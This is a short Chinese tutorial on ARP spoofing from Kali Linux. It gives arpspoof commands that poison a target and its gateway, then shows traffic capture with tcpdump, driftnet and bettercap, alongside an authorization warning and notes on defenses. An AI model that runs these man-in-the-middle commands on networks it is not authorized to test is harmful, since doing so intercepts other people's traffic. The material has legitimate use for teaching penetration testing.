kali arp欺骗

ARP欺骗(ARP Spoofing)的核心是伪造网关与目标设备的MAC地址映射,让流量经过你的Kali主机。请务必仅在自有网络或获得书面授权的环境中测试。

以下是使用 arpspoof(最简单)的标准步骤:

  1. 开启IP转发(让目标能正常上网,避免断网)

```bash

echo 1 > /proc/sys/net/ipv4/ip_forward

```

  1. 执行欺骗(需要两个终端窗口)

· 窗口1 - 欺骗目标(告诉目标:我是网关)

```bash

sudo arpspoof -i 网卡名 -t 目标IP 网关IP

```

· 窗口2 - 欺骗网关(告诉网关:我是目标)

```bash

sudo arpspoof -i 网卡名 -t 网关IP 目标IP

```

常用参数替换:-i eth0(你的网卡),-t 192.168.1.100(受害者),192.168.1.1(网关)。

  1. 验证与抓包

· 查看流量:sudo tcpdump -i eth0 host 目标IP

· 用 driftnet 抓图片,或 bettercap 进行更高级的中间人攻击。

停止欺骗:Ctrl+C 结束两个窗口,系统约30秒后自动恢复ARP表。或执行 ip link set arp off/on 快速重置。

现代防御:HTTPS加密网站(如银行、支付宝)只能抓到乱码,无法获取密码。开启ARP防火墙或使用静态ARP表可防御。

相关推荐
北龙云海11 小时前
案例分享 | 面向公网业务系统境内访问白名单配置实操方案
运维·网络·安全·网络安全·告警·数据泄露·入侵攻击
Draina14 小时前
CBC填充预言攻击-CBC Padding Oracle Crypto Attack
python·安全·web安全·网络安全·密码学·安全性测试
国际云,接待1 天前
Google Cloud Armor实战:给网站API加WAF、限速和日志验证
后端·网络安全·云计算·googlecloud
Demons_kirit2 天前
实验:文件路径遍历,简单情况(Lab: File path traversal, simple case)
网络安全
sbjdhjd2 天前
SQL 注入零基础详解:原理、手工注入流程与 Sqli-Labs 靶场实战1~5关和第9关思路
数据库·sql·计算机网络·web安全·网络安全·网络攻击模型·安全架构
学习溢出2 天前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全
学逆向的2 天前
汇编——寻址方式
开发语言·汇编·网络安全
上海云盾-高防顾问3 天前
SD-WAN 跨境加速,真实日常使用体验
网络·网络安全
中北marry3 天前
玄机靶场wp 应急响应-webshell查杀
网络安全
爱网络爱Linux3 天前
HCIA-Security(1)网络安全常见的威胁
web安全·网络安全·hcia-security·hcia安全·华为网络安全·网络安全常见的威胁